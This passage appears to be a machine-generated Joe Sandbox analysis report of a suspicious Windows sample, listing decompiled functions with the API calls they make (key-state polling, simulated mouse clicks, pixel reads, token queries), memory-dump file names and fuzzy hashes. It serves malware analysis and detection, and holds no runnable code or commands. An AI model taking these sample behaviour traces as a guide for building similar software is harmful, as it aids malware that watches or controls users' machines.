WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F0E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F0E6B4

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 24cd1ebf8cf1dd7c9e819914012e2d986e5743807e2455f8966063c1ec522095
Instruction ID: 1b62dfd26788b5f0d4087558cb933df49362927f5bb0330796d38073b06f6db1
Opcode Fuzzy Hash: 24cd1ebf8cf1dd7c9e819914012e2d986e5743807e2455f8966063c1ec522095
Instruction Fuzzy Hash: C551FB35A00105DFCB05EF64D981AAEBBF5EF0A314B1484A9E809AB3A2CB35ED11DF50

Function 00F2A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db152533f92c5238e611a244beb518f9610cf6c1c59bdbe9acee622a74d4a90b
Instruction ID: d0e8370bea93d8fcba0c6a011ee1f3509a0955148f70bdfbeaaafeb3324d7ea7
Opcode Fuzzy Hash: db152533f92c5238e611a244beb518f9610cf6c1c59bdbe9acee622a74d4a90b
Instruction Fuzzy Hash: 2141F535D04128AFD720DF38EC48FA9BBA4EB09330F140165F915A72E1C770AD65FA51

Function 00EA2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00EA2357
ScreenToClient.USER32(00F657B0,?), ref: 00EA2374
GetAsyncKeyState.USER32(00000001), ref: 00EA2399
GetAsyncKeyState.USER32(00000002), ref: 00EA23A7

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: cc16af37668d7911bee73e322094a632a19ddecc05caf2568db151b9161b678d
Instruction ID: 5f7b2d2ed756a1a5c7fc72d78f4f2c788a0adf687f2022fb53ce760a5ca8b5c2
Opcode Fuzzy Hash: cc16af37668d7911bee73e322094a632a19ddecc05caf2568db151b9161b678d
Instruction Fuzzy Hash: 9141843560411AFBCF258F68CC44AE9BB75FF0A364F20531AF924B6290C7346955EF91

Function 00EF63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00EF6433
TranslateMessage.USER32(?), ref: 00EF645C
DispatchMessageW.USER32(?), ref: 00EF6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF6475

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 3eb7c793fb712acfcb4a30db50990301339f7b4c6f819a78e1f9e8e844155d34
Instruction ID: c7ef2bc4341f5fce12040c37b9887eb87b7b1c6a897df5ca95f939c2f0cf83cd
Opcode Fuzzy Hash: 3eb7c793fb712acfcb4a30db50990301339f7b4c6f819a78e1f9e8e844155d34
Instruction Fuzzy Hash: A731C471A0064EAFDB24DF70CC44BB67BB8BB01714F141275E631E71A1E7659489E760

Function 00EF8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EF8A30
PostMessageW.USER32(?,00000201,00000001), ref: 00EF8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EF8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00EF8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EF8AF8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: f884d1669bddb015239f8f3ba4d1450fb13d46232c422aa537f838e2ce7ecd11
Instruction ID: 6ed4846160f977a3bfebf704f62be8e99f014b5a8258e77e7421f13ec02edfda
Opcode Fuzzy Hash: f884d1669bddb015239f8f3ba4d1450fb13d46232c422aa537f838e2ce7ecd11
Instruction Fuzzy Hash: F431C07150061DEBDF14CFA8DE4DAAE3BB5EB04315F10822AFA25EA2D1C7B09914DB91

Function 00EFB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00EFB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EFB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EFB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EFB27F
_wcsstr.LIBCMT ref: 00EFB289

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 5a6fd50491865237e2a45c6fd0c234ec63445aa65d74d4a3bbe6e46fa0f7e12d
Instruction ID: 1c11d5ce8a44171bb046e0641c3a27b9794bfa695527ca4c53d7c27de1fd03ac
Opcode Fuzzy Hash: 5a6fd50491865237e2a45c6fd0c234ec63445aa65d74d4a3bbe6e46fa0f7e12d
Instruction Fuzzy Hash: 9621B331204208AAFB255B75DC49E7F7BACDB49750F10913DF905EA161EB619C41A660

Function 00F2B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00EA2612: GetWindowLongW.USER32(?,000000EB), ref: 00EA2623

GetWindowLongW.USER32(?,000000F0), ref: 00F2B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F2B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F2B1CF
GetSystemMetrics.USER32(00000004), ref: 00F2B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F10E90,00000000), ref: 00F2B216

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 7aeeee80c39c19385c67ccaf7dd4986cd1cf7e7becf2de2a44c4569acc02edd0
Instruction ID: 3f95898d146c97609588539f16fdddcaabab75ee61c0650fa4254ff89dba6d70
Opcode Fuzzy Hash: 7aeeee80c39c19385c67ccaf7dd4986cd1cf7e7becf2de2a44c4569acc02edd0
Instruction Fuzzy Hash: 17217E71920266EFCB209F78AC04A6A3BA4EB05731F144638ED32D71E0D7309821EB90

Function 00EF9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EF9320

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EF9352
__itow.LIBCMT ref: 00EF936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EF9392
__itow.LIBCMT ref: 00EF93A3

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 59a88f4c8db56278e8c3358f766960257f5e83104360dba69b240302c51a4538
Instruction ID: b8a64820249e08a9a15437d1179b8bc886243de190db790df6bbb177b7abea0f
Opcode Fuzzy Hash: 59a88f4c8db56278e8c3358f766960257f5e83104360dba69b240302c51a4538
Instruction Fuzzy Hash: 2C21D33170120CABDB10AE649C85FFE7BA9EB49710F046025FA84BB182D6B0D94597A2

Function 00F15A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00F15A6E
GetForegroundWindow.USER32 ref: 00F15A85
GetDC.USER32(00000000), ref: 00F15AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00F15ACD
ReleaseDC.USER32(00000000,00000003), ref: 00F15B08

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5f9cedd349d574f2d279604c6ff768a45b0b515d5d1871a01dae19393f8215e7
Instruction ID: d3be35535e0cd2243790044091fcb24c4b0f8cc672ed078c5ba23d6513ff6f03
Opcode Fuzzy Hash: 5f9cedd349d574f2d279604c6ff768a45b0b515d5d1871a01dae19393f8215e7
Instruction Fuzzy Hash: A421C335A00108EFD714EF65DD84A9ABBF5EF48350F148079F849D7362CA34AC45EB90

Function 00EA12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EA134D
SelectObject.GDI32(?,00000000), ref: 00EA135C
BeginPath.GDI32(?), ref: 00EA1373
SelectObject.GDI32(?,00000000), ref: 00EA139C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 187f70e50b59af6edd72551ed00b3573bfb90c070179d5c448a11a2396e6db8d
Instruction ID: a2d0e55a9a5d8e13c455282f06d22f0628ce0e5d9211828fb2a253dcb7bc4689
Opcode Fuzzy Hash: 187f70e50b59af6edd72551ed00b3573bfb90c070179d5c448a11a2396e6db8d
Instruction Fuzzy Hash: 3021513080060CDFDF118F25DC0476D7BA8EB05B15F154266E420BB9B0D3B1A899EF90

Function 00F04A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F04ABA
__beginthreadex.LIBCMT ref: 00F04AD8
MessageBoxW.USER32(?,?,?,?), ref: 00F04AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F04B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F04B0A

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 8a316c389c2c395d0cdec5e1d8c785246a967eace3fce22996b473df49634613
Instruction ID: 45599961763312db14b750560a3ba21e32939c5a830e84360545ec0554a285e0
Opcode Fuzzy Hash: 8a316c389c2c395d0cdec5e1d8c785246a967eace3fce22996b473df49634613
Instruction Fuzzy Hash: 601108B6D0420CBBC7109FA8DC04B9B7FACEB45324F144269F924E3290D6B1DD04ABA1

Function 00EF8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EF821E
GetLastError.KERNEL32(?,00EF7CE2,?,?,?), ref: 00EF8228
GetProcessHeap.KERNEL32(00000008,?,?,00EF7CE2,?,?,?), ref: 00EF8237
HeapAlloc.KERNEL32(00000000,?,00EF7CE2,?,?,?), ref: 00EF823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EF8255

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 07e0d9b8586dbd17f31be27c4af62b302c623b35857f88317c2bafbe4237034b
Instruction ID: c0d2eaaec3027d8c1a39ee70d55cf1fba6b25707ecd5ebc52310da11a8f761e3
Opcode Fuzzy Hash: 07e0d9b8586dbd17f31be27c4af62b302c623b35857f88317c2bafbe4237034b
Instruction Fuzzy Hash: C0016971610208BFEB204FA6DD48D6B7FBCEF8A758B900439F909D2220DB319C15EA60

Function 00EF710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EF7044,80070057,?,?,?,00EF7455), ref: 00EF7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EF7044,80070057,?,?), ref: 00EF7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EF7044,80070057,?,?), ref: 00EF7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EF7044,80070057,?), ref: 00EF7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EF7044,80070057,?,?), ref: 00EF716C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 6d7d35af7ea3a778f29a0069c16c02b9fcff34486a508dd50d0a0016fce6cc14
Instruction ID: a7b07fa40c1574dabc66fffc131fa5d135964573bf3b8c1f9d8f69e2051a450a
Opcode Fuzzy Hash: 6d7d35af7ea3a778f29a0069c16c02b9fcff34486a508dd50d0a0016fce6cc14
Instruction Fuzzy Hash: 7E01D47261220CBBCB204F24DC44BAABBBCEF44751F140074FE48E2210D731DD0697A0

Function 00F05244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F05260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F0526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F05276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F05280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F052BC

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 4ec43ba3be3ac620f58937d2f95634256e63a3141230e12ed6078921d177d2e7
Instruction ID: d20edcd7c328e3472e177f7ac30fad0dc8e72d6a0fe38760653f63c5723d409c
Opcode Fuzzy Hash: 4ec43ba3be3ac620f58937d2f95634256e63a3141230e12ed6078921d177d2e7
Instruction Fuzzy Hash: EE016D31D01A1DDBDF10EFE4D8486EEBB78FF09B11F800066E941B2180CB705565BBA1

Function 00EF810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EF8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EF812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EF813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EF8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EF8157

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 82e8e29b4e6532a01f376be4d8cadf0552b064230a783226ce08da4957bdea4e
Instruction ID: 539871645dd4069a91178335075ff9f76b597b7b003ed645281ddca14109c90d
Opcode Fuzzy Hash: 82e8e29b4e6532a01f376be4d8cadf0552b064230a783226ce08da4957bdea4e
Instruction Fuzzy Hash: AAF06271211308AFEB214FA5EC88E773BBCFF49B58B000135FA45D6151CB719D56EA60

Function 00EFC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00EFC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00EFC20E
MessageBeep.USER32(00000000), ref: 00EFC226
KillTimer.USER32(?,0000040A), ref: 00EFC242
EndDialog.USER32(?,00000001), ref: 00EFC25C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 10ea59850734af5de2a7eb6ff1cd0dce9a0c6f09b0e8f56250aafeca65750323
Instruction ID: f9b3d79b252b802cd432ee05403320641de2aaa29b8a1427f1d31e06774777b8
Opcode Fuzzy Hash: 10ea59850734af5de2a7eb6ff1cd0dce9a0c6f09b0e8f56250aafeca65750323
Instruction Fuzzy Hash: 8E01A73041470C97FB305B50ED4EFA67BB8FB00B05F10026DA642B14F1D7E46949AB50

Function 00EA13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00EA13BF
StrokeAndFillPath.GDI32(?,?,00EDB888,00000000,?), ref: 00EA13DB
SelectObject.GDI32(?,00000000), ref: 00EA13EE
DeleteObject.GDI32 ref: 00EA1401
StrokePath.GDI32(?), ref: 00EA141C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 22cc32f56baeb0a6107e26a37f1666ee909183fab0d0236dad6fdd091dba3882
Instruction ID: f4d983715caee2f95aff17a96a589ff40c7cdf59f7a39944636b50e7e836a8cd
Opcode Fuzzy Hash: 22cc32f56baeb0a6107e26a37f1666ee909183fab0d0236dad6fdd091dba3882
Instruction Fuzzy Hash: D5F01930004A0CEBDB219F2AEC4C7583BB5AB06726F088264E4796A8F1C774599AFF10

Function 00F0C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F0C432
